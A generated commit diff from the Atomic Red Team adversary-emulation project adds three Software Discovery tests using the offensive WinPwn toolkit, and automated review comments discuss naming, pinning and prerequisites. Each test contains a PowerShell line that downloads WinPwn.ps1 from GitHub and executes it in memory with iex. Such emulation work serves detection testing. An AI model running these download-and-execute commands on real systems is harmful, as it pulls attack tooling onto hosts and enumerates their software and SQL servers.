Generated docs from job=generate-docs branch=master [ci skip]

Atomic Red Team doc generator
2022-05-08 02:04:19 +00:00
parent e39bbd9a3d
commit 5289ef6887
6 changed files with 144 additions and 1 deletions
+3
@@ -969,6 +969,9 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
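Review bot: The three new T1518 rows (tests 4 to 6) are named after the tool and its function (`WinPwn - Dotnetsearch`, `WinPwn - DotNet`, `WinPwn - powerSQL`), while the neighbouring rows name the behaviour being exercised (`Applications Installed`, `Find and Display Safari Browser Version`). Anyone mapping detection coverage from this index cannot tell what each test enumerates without opening the technique page, and `Dotnetsearch` and `DotNet` differ only by a suffix. Since this file is generated, the fix belongs in the source atomic: put the behaviour in the test name and keep the tool name as a qualifier.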
@@ -675,6 +675,9 @@ discovery,T1518.001,Security Software Discovery,5,Security Software Discovery -
discovery,T1518.001,Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
discovery,T1497.001,System Checks,4,Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows),4a41089a-48e0-47aa-82cb-5b81a463bc78,powershell
discovery,T1082,System Information Discovery,1,System Information Discovery,66703791-c902-4560-8770-42b8a91f7667,command_prompt
@@ -1503,6 +1503,9 @@
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #3: Find and Display Safari Browser Version [macos]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
@@ -1086,6 +1086,9 @@
- [T1518 Software Discovery](../../T1518/T1518.md)
- Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
- Atomic Test #2: Applications Installed [windows]
- Atomic Test #4: WinPwn - Dotnetsearch [windows]
- Atomic Test #5: WinPwn - DotNet [windows]
- Atomic Test #6: WinPwn - powerSQL [windows]
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
+36 -1
@@ -61901,9 +61901,44 @@ discovery:
executor:
name: sh
elevation_required: false
command: |-
command: |
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
- name: WinPwn - Dotnetsearch
auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
description: Search for any .NET binary file in a share using the Dotnetsearch
function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
name: powershell
- name: WinPwn - DotNet
auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
description: Search for .NET Service-Binaries on this system via winpwn dotnet
function of WinPwn.
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
name: powershell
- name: WinPwn - powerSQL
auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
description: Start PowerUpSQL Checks using powerSQL function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
name: powershell
T1497.001:
technique:
type: attack-pattern
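Review bot: Each of the three new executors sets `$S3cur3Th1sSh1t_repo` to the unpinned account root `https://raw.githubusercontent.com/S3cur3Th1sSh1t`, yet the visible commands never reference that variable, while the `downloadstring` URL on the next line is pinned to commit 121dcee26a7aca368821563cbe92b2b5638c5773. If WinPwn.ps1 reads the variable to fetch further scripts, those fetches are not covered by the pin and the code the test runs can change between runs; confirm that and say so in the description, or drop the variable if it is unused. The new entries also omit `elevation_required`, which the Safari test just above sets explicitly, and they declare no prerequisite for outbound access to raw.githubusercontent.com even though `iex(new-object net.webclient).downloadstring(...)` cannot work without it. Separately, the adjacent `command: |-` and `command: |` lines at the top of the hunk show the Safari test's block scalar style changing in a commit that is otherwise about WinPwn tests, and the new tests use `|-`, so the generated file is now inconsistent about trailing newlines.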
+96
@@ -12,6 +12,12 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
- [Atomic Test #3 - Find and Display Safari Browser Version](#atomic-test-3---find-and-display-safari-browser-version)
- [Atomic Test #4 - WinPwn - Dotnetsearch](#atomic-test-4---winpwn---dotnetsearch)
- [Atomic Test #5 - WinPwn - DotNet](#atomic-test-5---winpwn---dotnet)
- [Atomic Test #6 - WinPwn - powerSQL](#atomic-test-6---winpwn---powersql)
<br/>
@@ -100,4 +106,94 @@ Adversaries may attempt to get a listing of non-security related software that i
<br/>
<br/>
## Atomic Test #4 - WinPwn - Dotnetsearch
Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 7e79a1b6-519e-433c-ad55-3ff293667101
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput
```
<br/>
<br/>
## Atomic Test #5 - WinPwn - DotNet
Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
**Supported Platforms:** Windows
**auto_generated_guid:** 10ba02d0-ab76-4f80-940d-451633f24c5b
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive
```
<br/>
<br/>
## Atomic Test #6 - WinPwn - powerSQL
Start PowerUpSQL Checks using powerSQL function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** 0bb64470-582a-4155-bde2-d6003a95ed34
#### Attack Commands: Run with `powershell`!
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput
```
<br/>
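Review bot: In Atomic Test #5 the final line `dotnet -consoleoutput -noninteractive` only refers to a WinPwn function if the `iex` download on the line before it succeeded. On a host where that download is blocked and the .NET SDK or runtime is installed, PowerShell resolves `dotnet` to the dotnet executable on PATH, so the test may run something unrelated and still look as if it executed. The page should state that all three tests need outbound access to raw.githubusercontent.com, and the source atomic should stop when the download fails rather than carry on to the last line. Also, the Test #4 description says it searches "in a share", but `Dotnetsearch -noninteractive -consoleoutput` passes no share or path, so a reader cannot tell what is searched; either expose it as an input argument or reword the description.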